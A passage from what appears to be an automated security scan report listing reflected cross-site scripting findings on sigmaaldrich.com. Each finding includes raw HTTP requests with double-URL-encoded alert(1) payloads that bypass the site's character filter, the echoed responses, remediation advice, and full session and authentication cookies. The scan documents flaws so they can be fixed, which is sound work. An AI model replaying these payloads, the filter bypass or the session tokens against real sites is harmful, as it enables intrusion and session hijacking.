Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich3e07e";alert(1)//de125272a10/customer-support/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.160. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a4ac%2522%253balert%25281%2529%252f%252f7176143ea14 was submitted in the REST URL parameter 3. This input was echoed as 1a4ac";alert(1)//7176143ea14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support1a4ac%2522%253balert%25281%2529%252f%252f7176143ea14/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support1a4ac";alert(1)//7176143ea14/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.161. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7138a%2522%253balert%25281%2529%252f%252f2eed1d2cbaf was submitted in the REST URL parameter 4. This input was echoed as 7138a";alert(1)//2eed1d2cbaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service7138a%2522%253balert%25281%2529%252f%252f2eed1d2cbaf/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service7138a";alert(1)//2eed1d2cbaf/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.162. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc3c9%2522%253balert%25281%2529%252f%252f3022a9f9e58 was submitted in the REST URL parameter 5. This input was echoed as cc3c9";alert(1)//3022a9f9e58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicescc3c9%2522%253balert%25281%2529%252f%252f3022a9f9e58/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicescc3c9";alert(1)//3022a9f9e58/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.163. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20f7a%2522%253balert%25281%2529%252f%252ffa36f9bea3e was submitted in the REST URL parameter 6. This input was echoed as 20f7a";alert(1)//fa36f9bea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research20f7a%2522%253balert%25281%2529%252f%252ffa36f9bea3e/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research20f7a";alert(1)//fa36f9bea3e/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.164. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a4%2522%253balert%25281%2529%252f%252f439c0d0c37a was submitted in the REST URL parameter 7. This input was echoed as 911a4";alert(1)//439c0d0c37a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting911a4%2522%253balert%25281%2529%252f%252f439c0d0c37a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
